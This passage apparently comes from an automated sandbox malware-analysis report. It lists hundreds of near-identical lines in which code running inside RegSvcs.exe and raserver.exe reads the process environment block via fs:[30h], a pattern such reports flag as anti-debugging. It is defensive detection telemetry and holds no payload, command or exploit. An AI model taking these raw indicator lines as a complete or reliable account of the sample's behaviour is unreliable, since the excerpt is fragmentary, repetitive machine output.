            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01728CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01728F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01654F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01654F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0167F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_016EFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_016EFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0172070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0172070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_016937F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01668794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_016D7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_016D7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_016D7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0166766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0167AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0167AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0167AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0167AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0167AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01667E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01667E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01667E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01667E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01667E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01667E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0171AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0171AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0165E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0170FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0165C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0165C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0165C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01688E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0168A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0168A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01711608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_016676E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_016816E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01728ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_016836CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01698EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0170FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_016D46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01720EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01720EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01720EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_016EFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DEB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DEB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DEB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DEB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DEB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DEB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E114FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E28CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D558EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D6849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D59080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D8F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D8F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D8F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D990AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D70050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D70050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DEC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DEC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E12073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D8A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E21074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D7746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E2740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E2740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E2740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D8BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D8002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D8002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D8002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D8002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D8002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E24015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E24015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D6B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D6B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D6B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D6B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E1FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E1FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E1FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E1FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E08DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D5B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D5B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D5B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DE41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D6D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D6D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D8FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D8FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D82990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E205AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E205AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D7C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D82581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D82581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D82581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D82581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D8A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D52D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D52D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D52D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D52D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D52D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D81DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D81DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D81DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D861A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D861A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D835A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D77D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D7B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D7B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D93D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D7C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D7C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D5B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D5B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D5C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D59100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D59100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D59100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E28D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E1E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D8513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D8513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D84D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D84D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D84D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D5AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DDA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D74120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D74120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D74120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D74120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D74120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D82ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D836CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D98EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E0FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E28ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D676E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D816E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D82AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E20EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E20EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E20EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D8D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D8D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DEFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D6AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D6AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D8FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E0B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E0B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E28A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DE4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D59240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D59240 mov eax, dword ptr fs:[00000030h]
